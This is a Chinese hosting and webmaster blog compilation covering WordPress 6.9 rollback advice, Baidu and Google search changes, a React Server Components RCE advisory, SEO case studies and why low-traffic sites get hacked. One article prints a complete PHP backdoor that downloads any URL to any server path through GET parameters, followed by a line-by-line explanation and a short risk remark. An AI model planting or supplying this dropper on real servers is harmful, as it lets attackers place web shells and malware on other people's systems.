wp-config.php 文件外的所有WordPress核心文件。 验证恢复: 回滚后,立即检查网站加载速度与服务器CPU使用率,应即刻恢复正常。 第二步:故障分析与等待 暂缓升级: 所有尚未升级的生产站点,强烈建议在官方明确修复前,暂停升级至6.9版本。 测试环境先行: 务必在完整的、与生产环境镜像的测试站点中先行验证6.9的兼容性与性能。 监控官方通道: 关注WordPress官方博客、Bug追踪系统(Trac)及核心开发团队的更新,等待补丁版本(如预期的6.9.1)发布。 第三步:长期防护与最佳实践 强化备份纪律: 在任何核心、主题、插件更新前,必须完成完整的“代码+数据库”备份,并确保备份可快速还原。 建立性能基线: 使用监控工具记录站点正常的加载速度、核心Web指标(LCP、FID等)及服务器资源基线,任何更新后都与之对比。 考虑暂缓更新策略: 对于极其关键的业务站点,可考虑推迟非安全类的主版本更新1-2周,让社区先行“试毒”。 总结与反思 WordPress 6.9性能事件是一个典型的“边缘案例”引发生产事故的教训。它提醒每一位站长: “大多数站点运行良好” ≠ “你的站点运行良好”。 在高度依赖插件与主题生态的系统中,核心更新永远存在不可预见的兼容性风险。本次事件中,OPCache的异常指标为深入诊断提供了关键线索,也揭示了基础设施软件层(PHP)与应用层(WordPress)之间微妙的依赖关系。 行动指南: 已中招: 立即回滚至6.8.3。 未升级: 暂停行动,等待后续版本。 永远记住: 拥有一个可快速、可靠还原的备份,是你面对任何更新风险时最强大的底牌。 (主机帮将持续追踪此事件进展,并在第一时间提供官方修复方案。关注我们,获取最前沿的实战运维与安全防御指南。) #### 【行业重磅】谷歌搜索新增Reddit式论坛功能!SEO专家深度解析改版影响 5月13日,SEO顾问Nicholas McDonough通过推文披露,谷歌正在移动端搜索中测试"Google搜索论坛"功能。从曝光的截图可见,该功能允许用户像在Reddit社区一样进行实时讨论,支持发表评论、回复互动及点赞/踩操作。目前该功能率先应用于美国地区的体育赛事搜索场景。 当用户搜索如"尼克斯vs凯尔特人"等球队对战信息时,搜索结果顶部除常规赛程比分外,新增了讨论标签页。用户可绑定Google账号参与互动,所有评论会展示用户实名及头像。系统提供"全部评论"和"热门评论"两种浏览模式,点击用户头像可查看其历史发帖记录。 这一改版正值谷歌面临多重竞争压力:1)苹果高管Eddy Cue在法庭证词中透露,今年4月iOS设备的谷歌搜索量首现下滑2)ChatGPT等AI产品持续分流传统搜索流量3)谷歌自家Gemini的发展也需要搜索业务提供数据支撑 行业分析师指出,通过引入社交化UGC内容,谷歌意在:■ 提升用户停留时长■ 获取实时互动数据反哺AI训练■ 构建内容生态应对Reddit等平台的内容封锁策略 尽管目前仅开放体育垂类,但界面设计和交互逻辑已显现明显的Reddit风格。谷歌工程师在回复媒体问询时表示,未来可能根据测试效果拓展到科技、影视等更多领域。 #### 【重磅】百度搜索排名原则公开 互联网用户对内容需求的变化,驱动着互联网内容生态的不断革新,深刻改变着互联网内容生产、分发、传播、消费的全过程。在此背景下,百度搜索排序标准也随之升级。 2020年百度搜索线上公开课的收官之课,由产品经理陈敏杰为开发者们详细解读百度搜索排序的相关内容。 01 百度搜索排序原则 1、百度搜索结果按照用户的综合需求满足程度从高到低排序。 2、考察维度: (1)百度搜索排序原则中需要重点考察的四个维度分别是内容质量、权威性、浏览体验、时效性。 · 内容质量:资源本身所传递的价值高低。 △一般案例:内容质量一般,简单地总结了探春的性格特征。 △优质案例:内容质量优质,文字优美,在总结探春的性格特征之外,还运用了具体细节事例加以佐证,有理有据。 · 权威性:资源背后的生产者的专业程度。 △反面案例:在回答“健身减肥”领域的问题时,该生产者缺乏相关领域的认证,缺乏权威性。 △优质案例:在回答“健身减肥”领域的问题时,该生产者专注该领域的内容生产,且有平台“优质达人”的认证,具有一定的权威性。 · 时效性:资源的发布时间和内容的新旧程度。 △左图(反面案例)内容资源没有及时更新,仍然是考试时间未确定的答案;右图(优质案例)内容在考试时间确定后及时更新内容,满足用户需求。 · 浏览体验:用户消费内容或服务过程中的体验流畅度。 △左图(负面案例)页面挂件多,正文被部分遮挡,造成阅读障碍,广告与正文间距小,易引起误点击;右图(优质案例)正文无广告无挂件,浏览体验好。 (2)百度搜索排序原则的基本要求是内容相关性以及满足用户需求的主次程度。 · 相关性:资源对用户需求的匹配程度 △左图(优质案例)内容符合题目问题,相关性高;右图(反面案例)内容与题目问题无关。 · 需求主次:用户搜索时的主要意图和次要意图 △搜索“鸡胸肉”时,左图为用户主需内容,右图为用户次需内容 (3)百度搜索排序原则中不准入的内容资源包括:算法违规内容、低质内容、高获取成本内容。 △反面案例:左图内容资源文不符题,为低质内容;右图内容资源涉及恶意采集。 3、搜索排序原则总结 (1)内容质量是搜索排序原则中最重要的考察维度。 (2)关于医疗、法律等领域专业度要求高的内容需求,内容的权威性很重要。 (3)关于突发事件、价格等因素的内容需求,内容的时效性很重要。 (4)其他都差不多的情况下,搜索排序原则中单一维度越好的资源,搜索排序越靠前。 4、搜索如何判断一个内容的好坏 (1)看出身:知名、专业、权威、可信 △优质案例:左图内容生产者知名、有影响力;右图内容生产者是该领域的专业人士。 (3)看内涵:丰富、深度、实操、生动 △优质案例:内容实操性强,富有深度。 (4)看颜值:排版、结构、配色、格调 △优质案例:配色好看,结构清晰,生动有趣。 (5)看口碑:评论、点赞、收藏、分享 △优质案例:该内容观看量超500万,有2.9万弹幕,口碑上佳。 02 给开发者们的建议 1、贴近搜索用户的需求生产优质内容。 2、严控内容质量:及时翻修、更正瑕疵内容,持续生产优质内容。 3、在擅长的专业领域内持续深耕优质内容,提高内容权威性。 4、页面设计风格统一、美观、有格调;交互设计流畅,打造良好的用户体验。 03 互动答疑 1、优质内容中一定要添加视频内容吗?如果没有视频我的内容会不会被认为不够优质? 不会。搜索排序原则并不会对内容形态作具体要求,只要该内容符合上述所说的“出身、内涵、颜值、口碑”四个要求,就会被认为是搜索认可的优质内容。 用视频内容对已有的图文内容进行信息补充,有助于提高内容的丰富度;但是如果视频内容只是简单地重复文本的信息,且质量差,这种情况下不建议添加视频。 2、目前百度搜索结果是否存在“千人千面”的情况,不同用户搜索同一关键词会出现不同的搜索结果? 目前区别不会特别大,搜索结果主要是按照用户综合需求的满足程度、内容质量、相关性、权威性以及浏览体验等多维度进行综合评估,从高到底、从好到劣进行排序的。 3、纯文本内容的搜索排序是否比图文类内容的搜索排序更高? 不一定。主要衡量内容是否能够满足用户的需求,以及内容是否足够优质。内容的形态——文字、图文、视频本身不会影响搜索排序。如果只是为了追求内容形式的丰富,而增加了不相关的图片或者视频,反而会影响整体内容的质量;图片、语音、视频等不同形态的内容资源只有在能为用户提供需求的内容时,才会被认为是有价值的。 4、网站模板相同,是否违反了百度搜索算法规范? 对于站群问题,算法会根据多个因素综合判断,如页面排版相似度、内容质量、内容稀缺性、内容相似度等等。如果只是模板相似,内容不一样,且内容足够优质,那么不属于违反百度搜索算法规范的情况。 如果网站使用相同的页面排版,内容相似度较高,这类情况有可能被判定为站群,存在被算法命中的风险。 #### 【重要】百度惊雷算法3.0即将上线 持续打击刷点击作弊行为 为维护广大开发者的权益,促进移动生态的良性发展,百度搜索将于1月中旬推出惊雷算法3.0,并持续扩大算法的影响力。本次升级严厉打击通过伪造用户行为来试图提升网站搜索排序的作弊行为。 相对于惊雷算法2.0,本次算法有四个主要升级点: 1、加强了对作弊行为的识别; 2、加大了对作弊站点的打击力度; 3、扩大了算法的覆盖范围; 4、对违规行为较严重的领域(如:汽车、下载、招聘、B2B、网站SEO等)进行了针对性的打击。 还请存在问题的站点尽快自查整改。 我们鼓励开发者通过生产满足用户需求的优质内容来获取流量的良性增长,不要触碰搜索快排技术及其他违规作弊手段。搜索算法将持续迭代升级,为用户营造健康的移动生态。 #### 【高危漏洞警报】React Server Components 曝RCE漏洞(CVE-2025-55182),CVSS评分10.0,请立即升级! 主机帮 深度解读 各位开发者与运维同仁,请注意!前端生态核心框架React于12月3日发布紧急安全公告,其React Server Components(RSC) 特性中被发现一个未经身份验证的远程代码执行(RCE) 高危漏洞。该漏洞已被分配编号 CVE-2025-55182,并获得CVSS v3.1 10.0分(最高严重等级)。攻击者无需任何身份验证即可远程在服务器上执行任意代码,危害极大。 漏洞详情与影响范围 漏洞根源:由安全研究员Lachlan Davidson于11月29日报告。问题存在于React对发送至React Server Function端点的请求负载进行反序列化的过程中。攻击者可以构造一个特殊的恶意HTTP请求,当该请求被服务器端React反序列化时,即可触发远程代码执行。 关键点:即使您的应用程序没有主动创建或使用任何React Server Function端点,只要应用环境支持React Server Components(RSC),就可能暴露此攻击面。 受影响版本: React 19.0 React 19.1.0 React 19.1.1 React 19.2.0 涉及的主流框架与工具:如果您使用以下支持RSC的流行框架或构建工具,且它们引用了上述有漏洞的React包,则同样受到影响: Next.js React Router(当使用其RSC功能时) Waku Parcel (@parcel/rsc) Vite (@vitejs/plugin-rsc) RWSDK 官方修复方案(立即行动) React团队已在以下版本中修复了此漏洞: React 19.0.1 React 19.1.2 React 19.2.1 【站长建议操作步骤】 紧急升级:请立即检查您的项目package.json中的React依赖版本,并升级至对应的已修复版本(19.0.1、19.1.2或19.2.1)。 # 使用 npm 升级示例 npm update react react-dom # 或使用 yarn yarn upgrade react react-dom --latest 升级后请彻底清除构建缓存并重新启动开发服务器或生产服务。 验证依赖树:运行 npm list react 或 yarn why react 确认所有嵌套依赖引入的React包均已升级到安全版本。 框架特定更新:如果您使用前述的Next.js等框架,请同步关注其官方公告,并升级框架至包含已修复React版本的新版。 例外情况(不受影响)仅当您的应用满足以下所有条件时,可确认不受此漏洞影响: 您的React代码完全在客户端(浏览器)运行,不涉及任何服务器端渲染(SSR)。 您没有使用任何支持React Server Components的框架、打包器(如Webpack、Vite的RSC插件)或构建工具。 总结与建议此漏洞利用门槛相对较低且危害极大,属于“高危”级别。强烈建议所有使用React 19.x版本且涉及服务端渲染或React Server Components特性的项目立即安排升级。 对于生产环境,应在测试环境充分验证升级后应用稳定性,然后尽快部署安全版本。同时,建议审查服务器日志,关注是否有异常请求尝试访问RSC相关端点。 我们将持续关注此漏洞的动态及任何可能出现的变种利用方式。安全加固,刻不容缓! 参考链接: React官方安全公告: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components 主机帮提醒:筑牢服务器安全防线,从及时修补关键漏洞开始。 #### 一个IP多个网站会有影响吗?优缺点有哪些? 一个IP地址对应一个网站的情况被称为“单IP多站”或“单IP多域名”。这种配置在某些情况下会有影响,但在大多数情况下,它不会对您的网站产生负面影响,并且具有一些优点。下面是一些可能的影响和优点: 影响 安全问题:如果一个IP地址对应多个网站,黑客可能会将其中一个网站作为跳板来攻击其他网站。如果其中一个网站受到攻击,其他网站可能会受到影响,因为它们共享同一个IP地址。 性能问题:如果一个IP地址对应多个网站,它们可能会共享同一个服务器资源。如果其中一个网站的流量很大,可能会影响其他网站的性能。 优点 成本优势:单IP多站配置可以节省服务器硬件成本,因为只需要一个IP地址就可以管理多个网站。 灵活性:单IP多站配置允许您轻松添加或删除网站,而不需要更改IP地址。 易于管理:由于所有网站都在同一个IP地址下运行,管理员可以更容易地监视和管理所有网站。 总的来说,单IP多站配置在大多数情况下不会对您的网站产生负面影响,而且具有成本效益和灵活性。但是,如果您的网站流量非常大或者您希望获得更高级别的安全保护,那么您可能需要考虑使用虚拟专用网络(VPN)或其他类型的IP隔离解决方案。 #### 一个PHP后门代码:允许通过URL参数直接下载文件到服务器 <?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['filename'])){ if(httpcopy($_GET['url'], $_GET['filename'])){ echo("Done."); }else{ echo("Down Error."); } }else{ die('Input error.'); } function httpcopy($url, $file="", $timeout=60) { $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file; $dir = pathinfo($file,PATHINFO_DIRNAME); !is_dir($dir) && @mkdir($dir,0755,true); $url = str_replace(" ","%20",$url); if(function_exists('curl_init')) { echo "curl "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $temp = curl_exec($ch); if(@file_put_contents($file, $temp) && !curl_error($ch)) { return $file; } else { return false; } } else { echo "copy "; $opts = array( "http"=>array( "method"=>"GET", "header"=>"", "timeout"=>$timeout) ); $context = stream_context_create($opts); if(@copy($url, $file, $context)) { //$http_response_header return $file; } else { return false; } } } ?> 这段代码是PHP语言编写的,它的作用是从一个指定的URL下载文件,并将其保存到服务器上。下面是代码的逐行解释: set_time_limit(0); - 设置脚本的执行时间无限制,这样脚本可以运行任意长的时间。 if(isset($_GET['url']) && isset($_GET['filename'])){ - 检查是否有GET请求的参数url和filename。 if(httpcopy($_GET['url'], $_GET['filename'])){ - 如果httpcopy函数成功执行,即文件下载成功。 echo("Done."); - 输出“Done.”表示文件下载并保存成功。 }else{ - 如果httpcopy函数执行失败。 echo("Down Error."); - 输出“Down Error.”表示下载过程中出现了错误。 }else{ - 如果没有GET请求的参数url或filename。 die('Input error.'); - 终止脚本执行并输出“Input error.”表示输入错误。 function httpcopy($url, $file="", $timeout=60) { - 定义了一个名为httpcopy的函数,它接受三个参数:文件的URL、文件名(可选,默认为空),以及超时时间(默认60秒)。 $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file; - 如果没有提供文件名,就使用URL的最后一部分作为文件名。 $dir = pathinfo($file,PATHINFO_DIRNAME); - 获取文件名的目录路径。 !is_dir($dir) && @mkdir($dir,0755,true); - 如果目录不存在,则创建目录,权限设置为755。 $url = str_replace(" ","%20",$url); - 将URL中的空格替换为%20,因为URL中不能直接包含空格。 if(function_exists('curl_init')) { - 检查服务器是否支持cURL。 echo "curl "; - 如果支持cURL,输出“curl”。 使用cURL进行文件下载,如果成功则保存到指定的文件路径。 else { - 如果服务器不支持cURL。 echo "copy "; - 输出“copy”。 使用PHP的stream_context_create和copy函数进行文件下载,如果成功则保存到指定的文件路径。 } - 函数定义结束。 这段代码存在安全风险,因为它允许通过URL参数直接下载文件到服务器,这可能会导致恶意文件被下载和执行。在实际应用中,这样的脚本应该进行严格的安全检查和限制。 #### 一个不错的wordpress博客提高网站打开速度插件 要问主机吧建站最后悔的是什么,我会毫不犹豫回答,就是选用wordpress系统搭建博客。 恩,估计很多使用wordpress的站长会骂我,但就是这么回事。 wordpress系统在没有使用静态插件的情况下,打开速度真的慢出翔! 主机吧也曾经怪服务器太烂,打开慢,但换成百度云服务器后,并没有得到改善,使我明白了一个好的网站是永远离不开一个好的系统支持。 关于吐嘈wordpress系统问题主机吧会在下篇文章给详细说下,本篇文章是给大家介绍的一款可以给wordpress系统的网站提高速的插件-WP Super Cache 这个插件可以给博客内容页进行纯静态化,使网站内容访问不再请求PHP,从而达到提升速度的效果。 主机吧现在也用这款插件,新测速度提升80%。 安装这个插件很简单,进入后台插件,安装插件,搜索WP Super Cache,下载启用即可。 启用后设置如果小白的不需要什么高级设置,只要通后,开启缓存就行了。 #### 一个关于源服务器开启gzip,CDN上没开启的问题 最近,遇到一个有趣有问题:源服务器开启gzip,CDN上没开启,CDN节点请求是以gzip后的大小算还是按原始文件的大小算? 首先,我们需要了解源服务器和CDN(内容分发网络)的工作原理。 源服务器:这是存储和管理网站内容的原始服务器。当用户请求某个资源时,如果该资源在源服务器上可用,源服务器将直接响应用户的请求。 CDN:CDN是一种缓存技术,它在多个地理位置部署了缓存服务器。当用户请求某个资源时,CDN会首先检查其缓存中是否有该资源。如果有,CDN直接从缓存中提供资源给用户;如果没有,CDN会从源服务器获取资源,然后将其存储在自己的缓存中,并提供给用户。 Gzip压缩:这是一种减少文件大小的技术,通过压缩算法将文件内容压缩成更小的格式,从而加快文件的传输速度。 现在,我们来看你的问题:源服务器开启了Gzip压缩,但CDN上没有开启。那么,CDN节点请求资源时,是按照Gzip压缩后的大小算,还是按照原始文件的大小算? 答案是:这取决于CDN的配置和实现方式。 如果CDN被配置为尊重并保留源服务器的压缩设置,那么即使CDN本身没有开启Gzip压缩,它也会从源服务器获取已经压缩的文件,并按照压缩后的大小进行缓存和传输。 如果CDN被配置为忽略源服务器的压缩设置,并总是尝试自己进行压缩(尽管在这个例子中CDN并没有开启Gzip),那么它可能会再次压缩已经压缩过的文件,但这通常是不必要的,并且可能会浪费处理资源。不过,这种情况不太常见,因为大多数CDN都会尊重源服务器的压缩设置。 总之,在大多数情况下,CDN会按照从源服务器获取的资源大小(无论是否经过Gzip压缩)来计算。为了确保最佳性能和一致性,建议确保源服务器和CDN之间的压缩设置是一致的。 #### 一个减肥网站整体改版优化案例 最近分享了些SEO的知识,都是针对案例做整站优化,在这里把每次的优化都给记录下来,这样既能让大家看到效果,也能让新手站长更直观的学习,同时还能见证优化的方法是否可行等等。今天把本人最近优化的网站的整个操作步骤给大家分享下。 先简单说下我搞的这个网站历史,这个网站是我09年10月29号那个时候注册的,当时很流行做单页面的淘宝客,注册这个域名也是用来做单页面的减肥网站,也就是说这8年多时间,这个网站一直都是减肥网站,中间也没换过主题。我哇减肥网有过一段很辉煌的历史,如果你是草根老站长,那么对这个网站应该不会陌生,在2011年五月份到2012年7月份这段期间,这个网站是巅峰时刻。 阶段一: 09年11月到10年12月,有1年多的时间。那段期间我这个网站主题是减肥药排行榜,主要是做首页排名的一个减肥网站,排名起起伏伏,排名不算好,在这期间我手头还有另外一个减肥的网站,那个网站排名非常好,重心都花在了另外一个网站上,这个网站只做日常的更新维护,那个时候还没有手机端,流量都是来自PC端,而且搜索引擎流量也几乎都集中在百度,所以这个网站在这一年时间里也赚了一部分钱,估计一年也就几万。 后来,我那个苦逼的“我哇减肥网”和我另外一个减肥网站在10年12月份的时候百度更新排名全部掉没了,那一年我也是刚毕业,12月份我手头有30几万的现金,都是通过做减肥的淘宝客赚来的,也就是我哇减肥网和另外一个减肥网站赚来的,所以排名掉了后我就干脆放下网站,去上海旅游,记得那一年我在上海南京路和朋友一起跨年的... 元旦过后我就回来了,直到4月份,我又开始维护这个我哇减肥网,另外一个网站就放弃了,在4月份的时候我叫朋友一起维护,他们的意思就是这个网站被百度降权了,没有必要在继续维护,建议我做新网站,但是我感觉这个网站基础可以。 所以我找了一家淘宝卖减肥药的卖家给我投资,我挂她淘宝客,帮忙她做推广,她一个月给我五千的支持,因为在2010年的时候我帮忙她推广淘客赚了不少钱,所以她很相信我,就答应了这个事情,那个时候内链对于一个网站来说,排名是非常关键的,所以我就拿着这个钱去大的门户网站去发软文,至今这个软文还大部分存在,你可以去百度搜索下那个减肥网,都可以看到以前的软文; 那个时候站内优化好后,每天就更新几篇伪原创文章,然后在发几篇这种软文,一天发软文应该投资在几百元这样,坚持发了一个月,到了5月份,这个网站的排名开始慢慢恢复,很多词的排名开始到第二三页,小词部分到了百度首页。 5月份之后慢慢开始恢复排名,在那期间我也加大软文投放力度,而且也去购买了部分优质的媒体资源外链,这期间跟随着我发减肥软文的人也慢慢多起来,所以我基本都是比别人花更多的钱发更优质的媒体。 到了2011年7月份的时候,我把网站标题给改了,具体的标题我给忘记了,当时在A5有分享过这个标题,我用的是一句话标题,利用分词原理,百度会自动组合出非常多的减肥药,减肥产品的相关词排名,修改标题后到了8月份几乎承包了所有相关词的排名,而且几乎都在前三。 这个时候我安排专门人每天更新5篇伪原创,每天固定发软文带外链,一个月在外链建设上投资在3到5万左右,一个月的淘宝客广告收入也在13万到15万左右,排名一直稳定到2012年7月份。 这期间排名都很稳定,中间也有一部分小插曲,比如被攻击,要我把网站广告位很低价格卖给他,我都没答应,直接关站整整一周都没打开,庆幸的是对排名没有太大影响,期间也专门请了美工,按照我自己符合SEO的逻辑去改版了一次风格,排名都挺稳定,那时候甚至还有培训机构为了拉学员,直接说我是他们机构的学员等等,这期间网站模板,网站数据被无限制模仿,复制,镜像等。 噩梦的来临是在2012年7月份的哪天我给忘记了,百度进行了一次大更新,网站的所有排名三天内全部掉没了,直接从巅峰跌入了谷底。 阶段二: 12年7月到现在,当网站被和谐掉以后也就没在去打理过了,这期间也有恢复过一点排名过,也改过两次标题,但是由于没有打理,也没有配合上移动端等等,排名也都是昙花一现就没了,大家可以去看看历史数据,下面截图是我截图最近一个月的。 这期间也很多人联系我叫我网站卖给他,一两万什么,但是这是我挖掘第一桶金的网站,就想丢那做个纪念,也没有去打理。 直到最近很多朋友想看整体的优化案例,从整体优化到最后出排名结果,一个详细的操作过程,所以就想把这网站做个整体改版,然后操作了哪些细节,做了哪些事,最后排名变化等,做一个实操案例,这样大家学习起来也比较容易,并非很多人说的学习SEO培训都讲的模拟两可,或者听了也不会操作的一个尴尬局面。 改版 7月3号晚上我就把这网站正式上线,具体说应该是7月4号凌晨上线的,改版上线以后直到7月15号我都没有动过任何数据,15号也就是昨天我更新了一篇文章,这篇文章也是复制网络上的,修改了下标题,然后换了一个朋友的站的友情链接。 大家从上图可以看的到,现在的流量是改版前的三倍左右,也就10天的时间,但是这个是爱站的预测数据,并不准确的,而且是缓存数据并非实时排名,之前一天是几乎没IP,现在一天有几十个IP了,这站巅峰时候一个月赚10几万一天也就2000IP。 下面我可以看一个用关键词覆盖查询功能查询的实时排名数据,因为我改了标题,定位了几个主关键词,这几个主关键词排名如下图: 大家可以看的到,主关键词很多都进入了前三页,减肥药这个词直接进入了首页,这个是实时的排名数据,爱站看到的减肥药还在第二页第四位,他们的缓存数据还没更新过来应该。所以整体改版之后,只做了站内的细节优化,排名在慢慢上升,具体做了哪些其实也就是上一篇给大家分享的“结合案例教你如何做好SEO搜索引擎优化”,按这个步骤来操作的,相信很多草根新手不会操作。 今天这篇文章主要是给大家介绍网站的历史和基础数据,因为基础好,所以我只要做了站内优化,排名就会慢慢的开始起来。 作者:Seven #### 一个大型网站运营都经历了什么? 今天刚看了卢松松关于网站未来的发展方向谈,他后面的发展方向估计我们没多大关系,但是他之前经历的事情,是值得我们参考学习的,所以主机吧就转了下他这个博客经历的一些事情。 1.1 去年初,我被请去喝茶了 这件事我从未说过,原因是2012年发布了一篇关于VPN的文章,2020年的时候被网警扫到,也许是分到的部门不同,网警直接叫我过去喝茶,在经历了一系列流程之后,并签订协议后删除文章后,这事算过去了。 1.2 我有上级主管部门的QQ 从2014年开始,我QQ上就有一个上级主管部门的QQ,只要你网站出现了任何违法的关键词或文章,他们都会这个QQ来通知我,去年就沟通过两次。 1.3 网站被扫描过无数次 无论你在阿里云腾讯云百度云买的主机,他们都会扫你的网站,从中找出违规关键词。如果你不整改,第二天就会封站。卢松松博客去年被扫描过无数站,被关站过2次。 为此,我们还专门开发了一个小工具,网站违规内容关键词检测工具。把所有可能违规的关键词全部扫描出来,并做了部分整改。 1.4 去年底,我被黑客勒索过 我也被类似“七色光联盟”的组织勒索过,还不止一个,勒索的方式千奇百怪,有从你要比特币的、有要莱特币的、要友情链接的、也有要在你站发软文的、也有从你要二级目录的。总之,只要不配合他们都会DDOS攻击。然后会先攻击你一段时间,再勒索你。 相关阅读: 站长爆料:网站被恶意威胁k站索要5000元 站长爆料:网站被勒索交换友链 站长爆料:网站被恶意勒索,遭遇DDOS攻击 紫菜头博客被DNS污染攻击关站 1.5 不得已转向企业备案 从2019年开始,个人网站被管的越来越严了,这不行,那不行的。几乎每个月,主机服务商都会电话通知你整改,比如网站不能叫XX名、不能有行业内容、不能有评论广告、不能有XXX,要求非常多,这就导致很多个人网站备案都掉了,要么迁移到国外,要么就变成了企业备案。 比如卢松松博客变成企业备案后,又出现了新的问题,请接着往下看。 相关阅读: 备案新规:个人网站不得有行业内容必须转向企业备案 国内主机商开始取消个人网站备案码 站长爆料:部分地区备案需提供纳税证明 未备案就接入网站主机商被查 1.6 博客经常被文章版权被碰瓷 网站变成企业备案后,各路大神都来了,因为卢松松博客是以文章为主的网站,所以文章版权被碰瓷的事件时有发生,去年一年我就收到了两个法院传票。 通常他们的思路是,找几个不挣钱的自媒体人签个协议,购买大量他们写的文章版权(当然是没给钱的),然后拿着这些所谓的版权,去百度上、微信里到处搜索转载的网站和公众号,只要是企业认证的网站和帐号,都会被批量起诉。他们的要价很简单粗暴,文章一般都是要价5000元。大多数公司为了息事宁人,选择私下和解,少则赔几百,多则赔几千。 相关阅读: 因用户评论侵权:卢松松收到法院传票索赔6000元 卢松松博客评论侵权索赔6000元案子落幕:对方撤诉 网站因转载知乎文章被告上法院索赔5000元 1.7 我也收到过字体和图片侵权商洽函 虽然卢松松的博客是以文章为主的网站,但我还是被字体和图片找过。之前我也收到过含义字体的侵权商洽函,还有图片引用的律师函。可能是他们觉得我博客的体量太小,收到过几次商洽函之后,就没在联系过我了。 相关阅读: 我也收到汉仪版权字体侵权商洽函了 网友的公司官网引用图片被起诉赔偿8000元 文字版权公司盯上了抖音自媒体人 怎样避开图片版权的坑? 500多款无版权可商用字体免费下载 1.8 误屏蔽百度被K站 除了上面的这些外部因素,阻碍着网站的发展之外,网站的日常运营也是影响一个网站发展最重要的因素。去年我因为被频繁勒索,调整了服务器,在运维的时候不小心把服务器安全组关闭了,正好就把百度屏蔽了。这一骚操作,直接导致博客的收录断下式下跌。 好在后面发现的比较及时,很快就修正过来了。但也确实让我倒吸了一口冷气。做网站真的太脆弱了! 扪心自问:假如是你,前面又被黑客勒索、后面又屏蔽了百度,没了收录,然后又是各种审核。你能坚持的下来吗?95%的站长遇到上面这些问题,可能都会放弃了,所有"做网站越来越难了",已经成为业界共识。 相关阅读: 关于卢松松博客被百度K站说明:忘关安全组了 松松网的权重正在逐步恢复 1.9 百度“以号代替站”策略转型 不夸张的讲,十年之前,中国众多网站都仰仗于百度才能获得流量,其他几个搜索引擎都不行。而近几年,随着今日头条的兴起,百度的思路也变了。现在它的思路是:以号代替站! 也就是百家号要代替网站的大部分功能和展示。不信你看看现在的百度APP(移动端),出现的内容几乎80%都是百家号的内容了。   总得来说,用他一句:做网站越来越难了。 主机吧也同意这个观点,因为主机吧去开始也尝试做过新站,但效果不理想,体现在新站收录特别慢,百度好几个月才放出来,其它搜索引擎快半年了也没放出来,想靠搜索引擎免费混饭吃难了,现在流量都要收费了,舍不得花钱推广还是尽快放弃吧,非法也尽快放弃吧,太难了。 好处就是做站的门槛高了,竞争就少了,以前你要花心思跟几百万站长做竞争,现在你只要避开百度自家内容就可以了,几乎都可以得到流量,以主机吧博客为例,只要百度自家产品上没有收录的内容,几乎很容易得到排名,长尾词流量还是相当可观的,总之做站不会死,只是难做而以。 #### 一个没流量的网站,为什么还会被黑 一个看似“没流量”的网站被黑,其实非常常见。黑客攻击的目标往往不是流量本身,而是网站本身存在的可利用价值或漏洞。以下是一些主要原因和背后的逻辑: 黑客攻击低流量网站的常见动机 自动化扫描与“无差别攻击”: 僵尸网络(Botnets): 黑客控制着成千上万台被感染的计算机(肉鸡),它们24/7不停地扫描整个互联网上的IP地址,寻找任何开放端口(如80/http, 443/https, 22/ssh, 21/ftp等)。 漏洞利用工具: 这些扫描器会自动探测已知的软件漏洞(如过时的WordPress插件、未打补丁的服务器软件、弱密码等)。只要你的网站存在一个公开的、未修补的漏洞,不管有没有流量,都会被这些自动化工具发现并尝试入侵。 “广撒网”策略: 对黑客来说,入侵的成本(自动化工具)很低,只要成功入侵一小部分网站,就能获得巨大收益。你的网站只是“扫描列表”上的一个普通目标。 资源劫持: 僵尸网络节点: 入侵后,黑客可能在你的服务器上植入恶意软件,将其变成僵尸网络的一个新节点,用来发动DDoS攻击、发送垃圾邮件或扫描攻击其他网站。你的服务器资源(CPU、带宽)被免费征用了。 加密货币挖矿(挖矿劫持): 在你的服务器上偷偷运行加密货币挖矿程序,消耗你的计算资源和电力,为黑客牟利。 存储空间: 利用你的网站空间存储非法内容(盗版软件、电影、儿童色情、钓鱼页面等),或作为恶意软件的分发点。 搭建攻击跳板: 入侵你的网站后,黑客可能将其作为攻击更“有价值”目标(如银行、大公司)的跳板,隐藏自己的真实IP地址和踪迹。 域名和信誉滥用: 钓鱼攻击: 黑客可能篡改你的网站内容,将其变成一个模仿银行、支付平台或知名服务的钓鱼页面,诱骗访问者输入账号密码。即使你本身没流量,黑客可以通过垃圾邮件、社交媒体、黑帽SEO等方式将流量引到这个被黑的钓鱼页面上。 发送垃圾邮件: 利用你的网站服务器或关联的邮箱服务来发送大量垃圾邮件。 黑帽SEO: 在你的网站上注入大量垃圾链接(链接农场),试图操纵搜索引擎排名,为其他(通常是非法或低质量)网站引流。 域名劫持/重定向: 将你的域名解析指向恶意网站或广告页面。 数据窃取: 即使网站本身没什么内容,数据库里可能存有管理员/用户的邮箱和密码(尤其是如果密码是弱密码或在其他地方重复使用)。这些凭证信息在黑市上有价值,可用于撞库攻击(尝试登录其他网站)。 如果网站有表单(如联系表单),可能会被滥用来收集提交的数据。 “破窗效应”与练手: 安全防护薄弱的网站就像不锁门的房子,容易被路过的小偷光顾,有时只是为了练手或“找点乐子”。 为什么“没流量”不等于“安全” 暴露在互联网上: 只要你的网站服务器连接着互联网,它就有IP地址和开放的端口,就必然会成为自动化扫描的目标。 安全漏洞与疏忽: 导致被黑的核心原因是网站或服务器本身存在安全漏洞、错误配置或维护疏忽(如未更新软件、弱密码、不必要的服务开放等),而不是流量的多少。 攻击成本低: 自动化攻击的成本极低,黑客不需要“挑选”目标,系统会自动“收割”所有存在漏洞的目标。 如何保护你的“低流量”网站 保持软件更新: 这是最重要的! 及时更新操作系统、Web服务器软件(如Apache, Nginx)、数据库(如MySQL)、编程语言环境(如PHP, Python, Node.js)以及所有使用的CMS(如WordPress, Joomla)、主题、插件。绝大多数攻击利用的都是已知漏洞。 使用强密码与多因素认证: 为所有后台账户(管理员、FTP、数据库、服务器SSH)设置唯一且高强度的密码(长、复杂、随机)。务必为管理员登录启用多因素认证。 选择可靠的主机提供商: 研究主机商的安全措施、备份策略和响应速度。廉价的共享主机可能安全性较差且邻居网站被黑可能影响你。 最小化安装: 仅安装绝对必要的软件、插件和主题。不用的就删除。减少潜在的攻击面。 配置安全: 正确配置文件权限(遵循最小权限原则)。 